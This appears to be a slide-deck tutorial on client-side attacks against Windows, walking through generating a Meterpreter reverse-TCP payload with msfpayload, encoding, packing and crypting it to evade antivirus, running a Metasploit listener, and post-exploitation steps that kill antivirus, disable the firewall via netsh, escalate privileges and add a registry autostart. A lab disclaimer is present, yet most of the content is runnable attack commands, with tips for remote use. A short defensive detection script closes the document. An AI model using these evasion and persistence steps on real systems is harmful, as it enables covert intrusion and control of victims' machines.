Client Side Exploits Metasploit, Meterpreter, Obfuscation, Rogue Websites and Ettercap.

Client side exploits


1. Client Side Exploits: Metasploit, Meterpreter, Obfuscation, Rogue Websites and Ettercap.

2. Tools
Kali Linux: Metasploit (msfconsole, msfpayload, msfencode), Ettercap, Apache
Windows: Nemesis Crypter, .Net Shrink, DeepSea Obfuscator

3. Testing Environment pt.1
All examples shown will be performed in a controlled network; I do not condone the use of these methods in the wild.
[Network diagram] Host network 192.168.1.0/24; host computer running the virtualised environment (Oracle VirtualBox) with WAN 192.168.56.0/24 and LAN 10.0.2.0/24; virtual router (pfSense) with WAN 10.0.2.15 and LAN 192.168.2.0/24; Attacker (Kali) and Client (Win7) on the pfSense LAN.

4. Testing Environment pt.2: VirtualBox Configuration
1. Download the pfSense ISO (http://www.pfsense.org)
2. Create a new VM using the wizard
3. Install 2 NICs
4. NIC 1 should be configured to use NAT
5. NIC 2 should be configured to use Internal Network

5. Testing Environment pt.3: Kali Linux Configuration
1. apt-get update, upgrade, dist-upgrade, install -y linux-headers-$(uname -r)
2. cp /media/cd-rom/VBoxLinuxAdditions.run /root/
3. chmod 755 /root/VBoxLinuxAdditions.run; cd /root; ./VBoxLinuxAdditions.run
4. update-rc.d postgresql enable; update-rc.d metasploit enable
5. msfupdate

6. Metasploit pt.1: Payload Creation
Using msfpayload -h we can see all the available options. Using -l will show all of the available payloads; for this example we will be generating a meterpreter shell that connects back to the attacker, due to its flexibility.
Selecting the meterpreter reverse tcp payload: msfpayload windows/meterpreter/reverse_tcp O gives us the payload options, which we will input in the next step; X creates an executable; > pay.exe exports the payload to the file pay.exe. We will now have the executable pay.exe on our desktop.
Here we can choose how to output the payload: we can export to C or Ruby for later compiling, or to Java if we wanted to create an applet attack. For this example, however, we will be exporting to an executable for an infectious media attack.
We have 2 configurable options for this payload:
1. LHOST: the address of the attacking machine (for this lab we will use a local address; however, you can use an external address for a remote attack)
2. LPORT: the port used to connect back to the attacker. For this lab we will use port 4444; however, if you are behind a restrictive firewall you may want to select a port that will be open, e.g. 443 (SSL) or 53 (DNS). Also, if this is a remote attack you would have to port forward the selected port.

7. Checking Our Work
Uploading the file to Metascan will check our payload against 43 antivirus scanning engines. Unfortunately the payload we created was detected 26 times; we now have to work on lowering this detection rate.

8. Metasploit pt.2: Payload Encoding
We use msfencode with the same command; however, we now use the switch R to output the file as RAW and use | to pipe the file into msfencode. The raw output of the previous command is piped into another encoder using |. We use msfencode -e x86/countdown -c 5 -t exe -o payenc.exe to encode the file again and output the result to payenc.exe.
Note: this is by no means a comprehensive coverage of msfpayload or msfencode; I suggest reading Metasploit: The Penetration Tester's Guide for full usage of these tools.
msfencode: -e selects the encoder (in the example shikata_ga_nai is used); -c sets the number of times the payload is encoded; -t sets the output file to RAW.
Lastly we will pack our file to add an extra layer of obscurity using the following command: upx -9 payenc.exe payencpacked.exe

9. Checking Our Work
Uploading the file shows the results are not good; antivirus vendors are getting wise to the encoders we used. We now need to utilise some other methods to obfuscate the payload further.

10. Obfuscation pt.1: Over to you, Windows
Nemesis Crypter:
1. Main: select the location of the file
2. Options: set the encryption algorithm to AES
3. Assembly Information: set to random
4. Crypt file

11. Checking Our Work: Notice a Pattern Emerging
Ok, so that's a good enough detection rate. It's interesting to note that all the free antivirus vendors failed to detect our payload (AVG, I'm looking at you) whilst Norton and Kaspersky still detected it, thus highlighting the need to PAY for a good antivirus.

12. Obfuscation pt.2
.net Shrink, DeepSea Obfuscator, .net Reactor
No one method is fool proof; however, there are hundreds of tools to further obfuscate your payload, you just need to experiment. Antivirus vendors will eventually become wise to all encoders and obfuscators. I hope this highlights the importance of having a good antivirus (remember to laugh at Apple fan boys when they say they are immune to viruses).

13. Where are we now
We now have a payload that has a low detection rate. What do we do now? Two things need to be accomplished:
1. We need a method for the payload to connect from the client machine to the attacking machine (this is a client side attack, remember)
2. We need a way to get the victim to execute the payload (think social engineering; I will look forward to hearing your ideas)

14. Metasploit pt.3
Remember that we programmed our payload to reverse connect to 192.168.2.11:4444. We now need to set Metasploit to listen for connections on 192.168.2.11:4444. Start Metasploit using msfconsole. [Screenshot] Starts listening for client connections.

15. Metasploit pt.3 cont.
set LHOST sets the listen address, which is the IP of the attacker machine; set LPORT sets the listen port; exploit starts the listener. The attacking machine is now ready to accept incoming connections.

16. The user on the client machine clicks the malicious file. Notice that nothing suspicious happens; the user assumes that it is just a broken file, little do they know. Meanwhile the attacker machine has accepted a remote connection from the client. A meterpreter session is now open.

17. If we issue netstat -a on the client machine to list all remote connections, we see the connection from 192.168.2.7 (the client) to 192.168.2.11:4444 (the attacker).

18. Meterpreter Post-Exploitation
We have our meterpreter session to the client machine; we now need to ensure the client stays compromised:
1. Kill any antivirus (although our payload hasn't been detected, any future modifications may reveal the payload to the antivirus).
2. Kill the firewall
3. Migrate the meterpreter session to a secure process
4. Elevate our privileges
5. Make our meterpreter session persistent through reboots

19. idletime: we don't want to run these commands when the user is present. ps shows the running processes on the client machine. We now need to disable the antivirus; in this case the client is running Security Essentials, msseces.exe = 2356, so we issue kill 2356 (note: it is useful to familiarise yourself with the processes other antivirus packages use). Currently meterpreter is running as process abc.exe, which is highly suspicious; using the migrate command we will run meterpreter as explorer.exe (note: when using meterpreter we use the PID number rather than the process name, e.g. explorer.exe = 1424). Using getsystem and getprivs gives us the system user account and all the associated privileges. Using shell we drop down into the Windows command line and issue the command netsh advfirewall set allprofiles state off. The Windows firewall is now off. The system is now defenceless and we have complete control. I hope this slide has demonstrated the multidisciplinary nature of hacking by using both the Linux and Windows command line. I would recommend reading the following texts to further familiarise yourselves with both command lines.

20. Meterpreter: Maintaining Access
1. Use the shell command to get a Windows command prompt
2. We are now going to add a registry key that executes the payload at every boot by using the command reg add path to registry key
3. /v names the registry key
4. /t specifies the key type
5. /d defines the path to our executable
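The three host artefacts these slides change (the reverse connection seen with netstat, the firewall profiles switched off with netsh, and the autostart value added with reg add) are also the three things a defender can check for. The script below is an added example, not part of the original slides: it runs simple hunts over constructed copies of the relevant Windows command output, assuming the autostart lives in the standard HKCU Run key (the slide leaves the key path unspecified).

```python
"""Audit constructed Windows artefacts for the indicators the slides touch:
a Run-key autostart outside trusted directories, a firewall profile set to
OFF, and an established outbound connection to an unusual port.
All sample output below is constructed, not captured from the lab."""
import re

# Constructed 'reg query' output; assumes the standard HKCU Run key
REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    C:\Program Files\Microsoft OneDrive\OneDrive.exe
    updater     REG_SZ    C:\Users\alice\AppData\Local\Temp\payenc.exe
"""
# Constructed 'netsh advfirewall show allprofiles' excerpt
NETSH = """
Domain Profile Settings:
State                                 ON
Private Profile Settings:
State                                 OFF
"""
# Constructed 'netstat -ano' excerpt (PID column last)
NETSTAT = """
  TCP    192.168.2.7:49201   192.168.2.11:4444   ESTABLISHED   1424
  TCP    192.168.2.7:49210   93.184.216.34:443   ESTABLISHED   2200
"""
TRUSTED_DIRS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")
COMMON_PORTS = {22, 25, 53, 80, 443, 587, 993, 995}

def suspicious_run_entries(text):
    """Run-key values whose executable lives outside the trusted directories."""
    hits = []
    for m in re.finditer(r"^\s+(\S+)\s+REG_\w+\s+(.+?)\s*$", text, re.M):
        name, cmd = m.group(1), m.group(2).strip('"')
        if not cmd.lower().startswith(TRUSTED_DIRS):
            hits.append((name, cmd))
    return hits

def disabled_profiles(text):
    """Names of firewall profiles whose State is reported as OFF."""
    pairs = re.findall(r"(\w+) Profile Settings:\s*\nState\s+(\w+)", text)
    return [profile for profile, state in pairs if state == "OFF"]

def odd_outbound(text):
    """ESTABLISHED TCP connections whose remote port is not a common service."""
    hits = []
    for m in re.finditer(r"TCP\s+\S+:\d+\s+(\S+):(\d+)\s+ESTABLISHED\s+(\d+)", text):
        host, port, pid = m.group(1), int(m.group(2)), int(m.group(3))
        if port not in COMMON_PORTS:
            hits.append((host, port, pid))
    return hits
```

On a real host the same three functions can be fed the live output of reg query, netsh advfirewall show allprofiles and netstat -ano; a hit in any of them is worth correlating with the owning PID, since the slides show the session migrated into a trusted-looking process.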